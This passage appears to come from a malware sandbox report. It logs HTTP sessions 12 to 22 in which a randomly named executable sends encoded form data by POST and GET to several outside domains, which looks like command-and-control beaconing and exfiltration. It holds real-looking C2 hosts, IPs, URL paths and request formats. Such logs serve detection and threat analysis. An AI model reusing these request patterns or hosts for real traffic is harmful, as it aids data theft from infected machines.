                                                                                                                            12 | 192.168.2.4 | 50019 | 203.161.41.204 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Oct 19, 2024 12:57:53.879705906 CEST | 594 | OUT | GET /w90v/?2BWDG=pxDyyHWOZ6ShkfCEnqNJFogO2iS2H7GTGeagqdlkqhurb1KRhlhkT/xhewcGJOmLLVVpZKefMTitXH9lS8UNo0PZm0vp/3iOIb2YKVi8sc5e3OZy6VAXooU=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.setsea.info
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:57:54.578121901 CEST | 911 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:54 GMT
                                                                                                                            Server: Apache
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Content-Length: 690
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            13 | 192.168.2.4 | 50020 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Oct 19, 2024 12:57:59.666585922 CEST | 881 | OUT | POST /zqr8/ HTTP/1.1
                                                                                                                            Host: www.cablecarrental.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.cablecarrental.net
                                                                                                                            Referer: http://www.cablecarrental.net/zqr8/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=THIX8HXlbg1RGmCL899TwjS1yJBz1+XIyYykSxf0Q+ewRMYEYajyQmPRAXjOgWSQrDkbfn7ynDpH18w5kXwZWN/Yf8h/Hkgl6yzvEL3Zh1L4tV40M3NnRAecHMXi0WjkUAvCQKd2GMgF5DCHkEX4h6AsNQVmjh7xqXMAuNsJNjV1Ae8zZNdguIRrRCc1CoDAKw==


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            14 | 192.168.2.4 | 50021 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Oct 19, 2024 12:58:02.207951069 CEST | 901 | OUT | POST /zqr8/ HTTP/1.1
                                                                                                                            Host: www.cablecarrental.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.cablecarrental.net
                                                                                                                            Referer: http://www.cablecarrental.net/zqr8/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=THIX8HXlbg1REGeL+aRT3DS23JBzuOXUyY+kSwbeQN6wRtoEJobyVmPRL3jx/mT9rCYTflvynD9H19A5lkYaZ9/aWch9KEgl6yzvELiyh1D4tlI0MWNkQAefGMXilGivUAulQLATGIQF5BKHlVX3q6BnSAULgTqosGJPwds+CmxPFYtpI8838I1YMFVBPr+JR2w2Mq49teTUVqj8uzSpzec=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 50022 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:58:04.758877993 CEST | 10983 | OUT | POST /zqr8/ HTTP/1.1
                                                                                                                            Host: www.cablecarrental.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.cablecarrental.net
                                                                                                                            Referer: http://www.cablecarrental.net/zqr8/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
Data Ascii: 2BWDG= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 50023 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:58:07.298891068 CEST | 601 | OUT | GET /zqr8/?wfm=G6oTo8vx&2BWDG=eFg3/wX1FEtYOEOO4fQK8DyYn+9t5MnQ8eGMWFr4U+K0Svorcp+hU2bkMlDd81KIhBlHBG6GkgZ398FJiVEbDYmwZdVtcUsewSnSC4COghX7uWVmIVZIHjw= HTTP/1.1
                                                                                                                            Host: www.cablecarrental.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
Oct 19, 2024 12:58:07.936068058 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:07 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 254
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wfm=G6oTo8vx&2BWDG=eFg3/wX1FEtYOEOO4fQK8DyYn+9t5MnQ8eGMWFr4U+K0Svorcp+hU2bkMlDd81KIhBlHBG6GkgZ398FJiVEbDYmwZdVtcUsewSnSC4COghX7uWVmIVZIHjw="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 50024 | 221.128.225.57 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:58:13.986521959 CEST | 863 | OUT | POST /90ie/ HTTP/1.1
                                                                                                                            Host: www.cqghwamc.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.cqghwamc.top
                                                                                                                            Referer: http://www.cqghwamc.top/90ie/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=NHIvbP6ElPG00jhTt609m9/GQf7M8KD8ygHtQgw4RXSKeU8ElH1eTiGeV0bhLbMl4Aw4MvbySmePsOXhI6Wa+b+8/sofusfQq7ySzoJc711RsLqN6BRTtjhD3pmP29f4NHbi+PJaJWRCRz11IMP2P1+5H3GOiDedtFaKF1N9a8e3WB+Aqy0vh7CRwE5vqVo9kA==
Oct 19, 2024 12:58:14.948312998 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Set-Cookie: _d_id=a671d5211e16a0470c6885ef782ea8; Path=/; HttpOnly; SameSite=Lax
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:13 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 1163
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
Oct 19, 2024 12:58:14.950340986 CEST | 165 | IN
                                                                                                                            Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 50025 | 221.128.225.57 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:58:16.537206888 CEST | 883 | OUT | POST /90ie/ HTTP/1.1
                                                                                                                            Host: www.cqghwamc.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.cqghwamc.top
                                                                                                                            Referer: http://www.cqghwamc.top/90ie/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=NHIvbP6ElPG07gJTqb09hd/JMP7MraD4ygDtQh0WRiiKe1ME3W1eSiGeeUbkF7Mq4AMaMrTySmiPsOHhJN6Z4b+E3ModhMfQq7ySzoN2719Rt4iN7kxSujhEnJmP8df8NHbc+KhkJUpCRyF1I9PxB1+gIXHfkBzt1n6HCH90X4OXenva7DV4z7mitDwbnWV0/FUWV18bizWs/eK1CB+ranU=
Oct 19, 2024 12:58:17.484088898 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Set-Cookie: _d_id=a673d5211e16a0470c6885ef782ea8; Path=/; HttpOnly; SameSite=Lax
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:16 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 1163
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
Oct 19, 2024 12:58:17.484107971 CEST | 165 | IN
                                                                                                                            Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>
Oct 19, 2024 12:58:17.507009983 CEST | 165 | IN
                                                                                                                            Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 50026 | 221.128.225.57 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:58:19.082093000 CEST | 10965 | OUT | POST /90ie/ HTTP/1.1
                                                                                                                            Host: www.cqghwamc.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.cqghwamc.top
                                                                                                                            Referer: http://www.cqghwamc.top/90ie/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
Data Ascii: 2BWDG= [TRUNCATED]
Oct 19, 2024 12:58:20.029829025 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Set-Cookie: _d_id=a675d5211e16a0470c6885ef782ea8; Path=/; HttpOnly; SameSite=Lax
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:18 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 1163
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
Oct 19, 2024 12:58:20.030311108 CEST | 165 | IN
                                                                                                                            Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 50027 | 221.128.225.57 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:58:21.626403093 CEST | 595 | OUT | GET /90ie/?2BWDG=AFgPY5yU7pWSzToyhb8ap/LyT/DZ/ZjK5Re3S38zcWWIWncLwX1SLyCTcQH6faMmzCRwYrf9WSeYlPfjK7mc/MKG5u8f2O6ThoCO5oN+7y0XqZ+4yAUZ7Sk=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.cqghwamc.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
Oct 19, 2024 12:58:22.594252110 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Set-Cookie: _d_id=a674d5211e16a089760985ef782ea8; Path=/; HttpOnly; SameSite=Lax
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:21 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 1163
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
Oct 19, 2024 12:58:22.594269991 CEST | 165 | IN
                                                                                                                            Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 50028 | 199.59.243.227 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:58:27.886468887 CEST | 875 | OUT | POST /axh7/ HTTP/1.1
                                                                                                                            Host: www.662-home-nb.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.662-home-nb.shop
                                                                                                                            Referer: http://www.662-home-nb.shop/axh7/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=LXiyCe8Ra1a44MqlHQK+2smiSQfKZH8W3zUh417nkQT8qdxuL+KWMlLYl9WKo+aTQLfv/ICc3HIJZ32dVC1I+eFMOPoLf+JqdC6ozmMhM8/nprxbG9xdeBmoJ84r0QHGQj7aXi6pisodVNwjMNKBEfEOFeT1qhg7T8/ZHcmggP9nUNERt7DBljSPkrP8DP24FQ==
Oct 19, 2024 12:58:29.004385948 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                            date: Sat, 19 Oct 2024 10:58:27 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1134
                                                                                                                            x-request-id: 2041ebe1-f746-42f8-91b8-df80bd377703
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==
                                                                                                                            set-cookie: parking_session=2041ebe1-f746-42f8-91b8-df80bd377703; expires=Sat, 19 Oct 2024 11:13:28 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 19, 2024 12:58:29.004410028 CEST | 587 | IN
                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjA0MWViZTEtZjc0Ni00MmY4LTkxYjgtZGY4MGJkMzc3NzAzIiwicGFnZV90aW1lIjoxNzI5MzM1NT
Oct 19, 2024 12:58:29.004755020 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                            date: Sat, 19 Oct 2024 10:58:27 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1134
                                                                                                                            x-request-id: 2041ebe1-f746-42f8-91b8-df80bd377703
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==
                                                                                                                            set-cookie: parking_session=2041ebe1-f746-42f8-91b8-df80bd377703; expires=Sat, 19 Oct 2024 11:13:28 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 50029 | 199.59.243.227 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:58:30.428373098 CEST | 895 | OUT | POST /axh7/ HTTP/1.1
                                                                                                                            Host: www.662-home-nb.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.662-home-nb.shop
                                                                                                                            Referer: http://www.662-home-nb.shop/axh7/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=LXiyCe8Ra1a4+s6lLTi++smhPgfKTn8S3zQh40v3xz38q4VuZvKWLlLYudWPleamQKjJ/J+c3HcJZ2GdVVBX/OFZBvoFCuJqdC6ozn8HM4TnpahbHcxaCRmvZs4rigHKQj7sXh+DioYdVIUjMZeCOfEXP+Se60NFSObIHtzAl/gHRLVL8KiW3j285sGIOMLxeUEqyQQZIWtZI1lF/22aCTQ=
Oct 19, 2024 12:58:31.054749966 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                            date: Sat, 19 Oct 2024 10:58:30 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1134
                                                                                                                            x-request-id: 999f9fc2-6b10-453b-9dfa-c4938ce814af
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
